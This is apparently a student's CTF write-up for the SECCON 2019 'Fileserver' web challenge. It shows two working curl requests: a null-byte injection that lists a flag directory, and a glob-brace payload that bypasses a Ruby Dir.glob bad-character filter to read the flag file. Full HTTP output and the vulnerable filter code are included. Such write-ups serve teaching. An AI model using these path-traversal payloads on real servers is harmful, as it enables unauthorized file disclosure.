Update my writeup.

[pub/jan/ctf-seminar.git] / writeups / writeups / someone / seccon19.md

# Fileserver (web)
+ 345 points/39 solves
+ I actually never wrote ruby before.
  + The challenge was mostly googling ruby-docs.
+ Unfortunately this is my best documented challenge this term so far :/


## description
```
I donno apache or nginx things well, I guess I can implement one for myself though. See? It’s easy!
http://fileserver.chal.seccon.jp:9292/public/index.html
Due to maintainability, we restart the server of fileserver challenge every 5 minutes.
```

The challenge is two-staged and consisted of a few files served by itself:
+ app.rb
+ Gemfile
+ file-list-template
+ public/index.html
+ public/some-images


## TL;DR: Solution

https://mattermost.w0y.at/seccon-2019/pl/ta1rjitc7jn4ugo4cw5z7nc5xa

### Stage 1: Get flag path

``curl --path-as-is -v 'fileserver.chal.seccon.jp:9292/%00/tmp/flags/' -o -``
```
> GET /%00/tmp/flags/ HTTP/1.1
> Host: fileserver.chal.seccon.jp:9292
> User-Agent: curl/7.64.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Content-Type: text/html
< Server: WEBrick/1.5.0 (Ruby/2.6.5/2019-10-01)
< Date: Sat, 19 Oct 2019 16:25:31 GMT
< Content-Length: 737
< Connection: Keep-Alive
<
<!DOCTYPE html>
<meta charset="utf8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Fileserver</title>
<link rel="stylesheet" href="https://unpkg.com/bulmaswatch/cerulean/bulmaswatch.min.css">
<section class="section">
  <div class="container">
    <h1 class="title">Index of //tmp/flags/</h1>
    <div class="list is-hoverable">

        <a class="list-item" href="/./">./</a>

        <a class="list-item" href="//tmp/flags/K3Y90aCrrmQjHKMgJ1lWWiMBgK1p2MgI.txt">/tmp/flags/K3Y90aCrrmQjHKMgJ1lWWiMBgK1p2MgI.txt</a>

    </div>
    <hr>
    <span class="is-italic">WEBrick/1.5.0 (Ruby/2.6.5/2019-10-01) Server at fileserver.chal.seccon.jp:9292</span>
  </div>
```

### Stage2: get file content

``curl --path-as-is -v 'fileserver.chal.seccon.jp:9292/%7B/tmp/flags/K3Y90aCrrmQjHKMgJ1lWWiMBgK1p2MgI.txt,%5B%7D' -o -``
```
> GET /%7B/tmp/flags/K3Y90aCrrmQjHKMgJ1lWWiMBgK1p2MgI.txt,%5B%7D HTTP/1.1
> Host: fileserver.chal.seccon.jp:9292
> User-Agent: curl/7.64.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Content-Type:
< Server: WEBrick/1.5.0 (Ruby/2.6.5/2019-10-01)
< Date: Sat, 19 Oct 2019 16:26:01 GMT
< Content-Length: 36
< Connection: Keep-Alive
<
SECCON{You_are_the_Globbin'_Slayer}
```


## The road to enlightenment - aka (failed) attempts
### 3:52 PM - Every file is also a directory.
```
it seems to always show a "directory listing" if you add / at the end and the directory doesnt contain a dot

http://fileserver.chal.seccon.jp:9292/Gemfile
http://fileserver.chal.seccon.jp:9292/Gemfile/
```

But after fiddling around with that, it didnt reveal any vulnerabilities like possible file includes or directory traversals.


Teammate `@sumhack` was trying to get past the path-normalisation to make a classical path traversal work using dots. Without much sucess. But he noticed that ``if you add a [, you can use {} as you like``, but unfortunately deemed that information useless a short while later: ``i just realized that {} is useless for our task here``.


### 4:18 PM - Suspicion: globbing issues?
``````
I suspect its something with file globbing. why would they check if the brackets match? just a red herring?

```
def is_bad_path(path)
  bad_char = nil

  %w(* ? [ { \\).each do |char|
    if path.include? char
      bad_char = char
      break
    end
  end

  if bad_char.nil?
    false
  else
    # check if brackets are paired
    if bad_char == ?{
      path[path.index(bad_char)..].include? ?}
    elsif bad_char == ?[
      path[path.index(bad_char)..].include? ?]
    else
      true
    end
  end
end

```

``````


### nothing works :(
After more than a hour of trying to get a classical path traversal to work. Finally there was progress.
+ I was shown what I did wrong: missing ``--path-as-is`` in my curl calls.
+ Now at least `@sumhack` and myself were getting the same errors and were stuck at the same spot.
+ The oranisers seem to have performance issues and the service is down for a while every few seconds.


### frustration :/
Frustrated by the lack of any success or progress in exploiting ruby's string-interpolation I turned back to Dir.glob and wanted to understand, how it worked in full detail and started googling. Turns out:
+ It is widely used exactly the same in real-world, which normally is a bad sign for CTFs.
+ The matching works like a bash's globbing and not like regex.
+ There is a relatively recent CVE: ``CVE-2019-5418``.
  + null-byte-injection it is!
  + For some weird reason only the part AFTER the null-byte is matched, in case of a null-byte.


### 6:01 PM - getting there?
```
        <a class="list-item" href="//tmp/flags/c4Fc3iGV8YUfFqBkLUEYr0ur7GyuJBaH.txt">/tmp/flags/c4Fc3iGV8YUfFqBkLUEYr0ur7GyuJBaH.txt</a>

but how do I get the file content? :/
```
It turns out: its a multi-staged challenge: We somehow still need to inject dots to get the file's content which we believed at this point to be impossible.


### 6:24 PM - PWND! ^.^
Turns out: 
+ Dots are in fact unusable, but one does not need dots, if we can use Dir.glob.
+ To be able to use ``{}`` in glob, we need to use a ``[`` somewhere.
+ null-bytes do not help here.
+ The trick to get rid of the ``[`` is to put it inside of the ``{}`` match -> ``{something, [}`` and ``something = the absolute path of the flag``.

The flag:
```
``SECCON{You_are_the_Globbin'_Slayer}``
```